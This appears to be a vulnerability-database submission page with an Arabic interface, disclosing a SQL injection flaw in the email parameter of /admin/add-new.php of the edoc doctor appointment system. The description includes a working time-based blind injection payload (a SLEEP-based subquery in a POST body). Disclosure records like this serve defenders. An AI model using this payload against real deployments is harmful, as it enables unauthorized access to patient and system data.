إرسال #95224: Sql injection exists for email parameter of edoc doctor appointment systemالمعلومات

عنوانSql injection exists for email parameter of edoc doctor appointment system
الوصفSQL injection vulnerability exists in email parameter of /admin/add-new.php file of edoc doctor appointment system Important user data or system data may be leaked and system security may be compromised.The environment is secure and the information can be used by malicious users. Payload:name=SQL Inject&email=123@123com' AND (SELECT 6850 FROM (SELECT(SLEEP(5)))nzPq) AND 'AFoB'='AFoB&nic=123&Tele=123123123123&spec=1&password=123&cpassword=123
المصدر⚠️ https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20doctor%20appointment%20system%20vlun5.pdf
المستخدم
 SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874)
ارسال27/02/2023 08:24 AM (3 سنوات منذ)
الاعتدال27/02/2023 12:08 PM (4 hours later)
الحالةتمت الموافقة
إدخال VulDB221826 [SourceCodester Doctors Appointment System 1.0 Parameter /admin/add-new.php email حقن SQL]
النقاط20

التالي نظرة عامة السابق

Want to know what is going to be exploited?

We predict KEV entries!